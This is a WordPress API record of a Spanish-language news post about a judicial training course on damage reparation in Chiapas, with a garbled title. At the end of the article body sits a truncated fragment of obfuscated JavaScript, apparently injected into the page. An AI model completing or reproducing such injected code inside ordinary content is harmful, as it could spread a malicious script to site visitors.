{"id":9156,"date":"2023-03-25T07:02:56","date_gmt":"2023-03-25T07:02:56","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9156"},"modified":"2023-03-25T07:02:56","modified_gmt":"2023-03-25T07:02:56","slug":"%f0%9d%90%80%f0%9d%90%9b%f0%9d%90%a8%f0%9d%90%a7%f0%9d%90%9a-%f0%9d%90%8f%f0%9d%90%a8%f0%9d%90%9d%f0%9d%90%9e%f0%9d%90%ab-%f0%9d%90%89%f0%9d%90%ae%f0%9d%90%9d%f0%9d%90%a2%f0%9d%90%9c%f0%9d%90%a2","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9156","title":{"rendered":"????? ????? ???????? ? ?? ???????????\u0301? ?? ?????????? ?? ??????? ?? ???????? ???????"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230325-WA0011-1024x768.jpg\" alt=\"\" class=\"wp-image-9157\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230325-WA0011-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230325-WA0011-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230325-WA0011-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230325-WA0011.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p> 14 de marzo del 2023Tuxtla Guti\u00e9rrez El Poder Judicial del Estado de Chiapas, encabezado por el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Guillermo Ramos P\u00e9rez, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, fue sede del curso La Reparaci\u00f3n del Da\u00f1o en Perspectiva M\u00e9xico y el Derecho Internacional de los Derechos Humanos.Este curso estuvo dirigido a las y los magistrados, visitadores y jueces en materia civil, familiar, penal y de Justicia para Adolescentes, as\u00ed como personal de defensor\u00eda p\u00fablica, y #servidoras y servidores p\u00fablicos de esta casa de la Justicia, y fue disertado por el ponente Antonio Sorela Castillo, autor de libros como La Declaraci\u00f3n Universal de Derechos Humanos versi\u00f3n comentada y traducida al N\u00e1huatl y coautor de los Nuevos Desaf\u00edos del Derecho Iberoamericano, entre otros.En este evento la #consejera de la Judicatura, Mar\u00eda Itzel Ballinas Barbosa, fue la encargada de ofrecer un mensaje de bienvenida a las y los asistentes a este curso, as\u00ed mismo resalt\u00f3 la importancia de capacitar y actualizar la informaci\u00f3n en temas importantes como la protecci\u00f3n y priorizaci\u00f3n de los Derechos Humanos.Adem\u00e1s, apunt\u00f3 que uno de los temas torales es conocer las reformas del sistema jur\u00eddico mexicano de junio del  2008 y  2011, que en su implementaci\u00f3n trajo impl\u00edcita los ideales de justicia vinculados con los Derechos Humanos, as\u00ed como los Tratados Internacionales Aplicables como la Reparaci\u00f3n Integral del Da\u00f1o, a la que tiene derecho la v\u00edctima como parte de sus derechos fundamentales, para que los Tribunales garanticen su cumplimiento y efectividad.En su intervenci\u00f3n el ponente agradeci\u00f3 la invitaci\u00f3n del magistrado presidente Guillermo Ramos, y manifest\u00f3 su benepl\u00e1cito por su estancia en tierras chiapanecas, antes de comenzar su ponencia; destac\u00f3 la relevancia de compartir sus experiencias y conocimientos en la aplicaci\u00f3n de la Reparaci\u00f3n Integral del Da\u00f1o en el Sistema Interamericano de Derechos, aplicable en todas las materias y de la actuaci\u00f3n civil.Estuvieron presentes en el pres\u00eddium, el consejero de la Judicatura Omar Heleria Reyes; el coordinador de asesores, V\u00edctor Manuel Zepeda L\u00f3pez y el director del Instituto de Formaci\u00f3n Profesionalizaci\u00f3n y Carrera Judicial, Pedro Farro \u00c1lvarez.#PJEChiapas #JusticiaParaTodasyTodos #Tribunaldepuertasabiertas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>14 de marzo del 2023Tuxtla Guti\u00e9rrez El Poder Judicial del Estado de Chiapas, encabezado por el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Guillermo Ramos P\u00e9rez, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, fue sede del curso La Reparaci\u00f3n del Da\u00f1o en Perspectiva M\u00e9xico y el &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9157,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-9156","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9156","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9156"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9156\/revisions"}],"predecessor-version":[{"id":9158,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9156\/revisions\/9158"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9157"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9156"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9156"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9156"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}